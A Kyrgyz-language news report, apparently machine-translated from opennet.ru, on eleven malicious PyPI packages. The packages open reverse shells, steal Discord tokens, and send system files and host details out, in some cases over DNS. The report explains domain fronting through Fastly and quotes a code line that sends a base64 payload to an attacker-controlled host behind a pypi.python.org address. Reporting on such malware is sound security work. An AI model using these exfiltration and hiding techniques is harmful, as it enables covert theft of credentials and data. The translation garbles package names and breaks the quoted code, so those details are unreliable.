PyPI (Python Package Index) каталогунда зыяндуу кодду камтыган 11 пакет аныкталган. Көйгөйлөр аныкталганга чейин пакеттер жалпысынан 38 миңге жакын жолу жүктөлүп алынган. Табылган зыяндуу пакеттер чабуулчулардын серверлери менен байланыш каналдарын жашыруу үчүн татаал ыкмаларды колдонуусу менен өзгөчөлөнөт.
- маанилүү пакет (6305 жүктөө), маанилүү-пакет (12897) - системага кабыкча жеткиликтүүлүктү камсыз кылуу үчүн pypi.python.org сайтына туташуу жамынуусу менен тышкы серверге туташууну орнотту (тескери кабык) жана trevorc2 программасын жашыруу үчүн колдонду. Байланыш каналы.
- pptest (10001), ipboards (946) - DNS тутум жөнүндө маалыматты берүү үчүн байланыш каналы катары колдонулат (биринчи пакетте хосттун аты, жумушчу каталогу, ички жана тышкы IP, экинчисинде - колдонуучунун аты жана хост аты) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - системадагы Discord кызмат белгисин аныктап, аны тышкы хостко жөнөттү.
- trrfab (287) - тышкы хостко идентификаторду, хосттун аталышын жана /etc/passwd, /etc/hosts, /home мазмунун жөнөттү.
- 10Cent10 (490) - тышкы хост менен тескери кабык байланышын түздү.
- yandex-yt (4183) - система бузулуп жатканы жана nda.ya.ru (api.ya.cc) аркылуу берилген андан аркы аракеттер тууралуу кошумча маалымат бар баракка багытталып жатканы жөнүндө билдирүүнү көрсөттү.
Өзгөчө белгилей кетчү нерсе, маанилүү жана маанилүү пакет пакеттеринде колдонулган тышкы хостторго кирүү ыкмасы, алардын активдүүлүгүн жашыруу үчүн PyPI каталогунда колдонулган Fastly мазмун жеткирүү тармагын колдонгон. Чындыгында, сурамдар pypi.python.org серверине жөнөтүлгөн (анын ичинде HTTPS сурамынын ичинде SNIде python.org атын көрсөтүү), бирок HTTP "Хост" аталышында чабуулчулар көзөмөлдөгөн сервердин аталышы камтылган (сек. forward.io. global.prod.fastly.net). Мазмун жеткирүү тармагы маалыматтарды өткөрүп жатканда pypi.python.org сайтына TLS туташуу параметрлерин колдонуп, чабуулчу серверге ушундай суроо-талапты жөнөткөн.
PyPI инфраструктурасы Fastly контент жеткирүү тармагы менен иштейт, ал жалпы суроо-талаптарды кэштөө үчүн тунук Varnish проксисин колдонот жана HTTPS суроо-талаптарын прокси аркылуу багыттоо үчүн акыркы чекит серверлеринде эмес, CDN деңгээлинде TLS сертификаттарын иштетет. Максаттуу хостко карабастан, суроо-талаптар проксиге багытталат, ал "Host" HTTP аталышын колдонуп, каалаган хостту аныктайт. домен аттары Хосттор бардык Fastly кардарлары үчүн жалпы болгон CDN жүк баланстагычынын IP даректерине туташтырылган.
Чабуулчунун сервери ошондой эле Fastly CDNде катталат, ал каалаган адамга акысыз пландарды сунуштайт жана ал тургай анонимдүү каттоого мүмкүндүк берет. Белгилей кетчү нерсе, тескери кабык жабырлануучуга суроо-талаптарды жөнөтүү үчүн да колдонулат, бирок ал чабуулчунун хостунан башталат. Сырттан караганда, чабуулчунун сервери менен болгон өз ара аракеттенүү PyPI каталогу менен шифрленген мыйзамдуу сеанстар болуп көрүнөт. TLS сертификаты PyPI. "Домен фронтинги" деп аталган ушул сыяктуу ыкма мурда бөгөттөөнү айланып өтүүдө хост аттарын жашыруу үчүн кеңири колдонулган. Бул ыкма кээ бир CDNдер тарабынан сунушталган HTTPS кирүү функциясын колдонот, SNIде жасалма хост атын көрсөтөт жана суралган хост атын TLS сессиясынын ичинде HTTP Host аталышында жөнөтөт.
Зыяндуу аракеттерди жашыруу үчүн TrevorC2 пакети сервер менен кадимки веб навигацияга окшош өз ара аракеттенүү үчүн кошумча колдонулган, мисалы, “https://pypi.python.org/images/” сүрөтүн жүктөө жамынуусу менен зыяндуу суроо-талаптар жөнөтүлгөн. guid =” guid параметринде маалыматты коддоо менен. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, аталыштар = {'Хост': "psec.forward.io.global.prod.fastly.net"})
pptest жана ipboards топтомдору DNS серверине суроо-талаптардагы пайдалуу маалыматты коддоштуруунун негизинде тармак активдүүлүгүн жашыруу үчүн башка ыкманы колдонушкан. Кесепеттүү программа маалыматты "nu4timjagq4fimbuhe.example.com" сыяктуу DNS суроо-талаптарын аткаруу менен өткөрөт, мында башкаруу серверине берилүүчү маалыматтар субдомендик аталыштагы base64 форматын колдонуу менен коддолгон. Чабуулчу бул билдирүүлөрдү example.com доменинин DNS серверин башкаруу аркылуу алат.
Source: opennet.ru
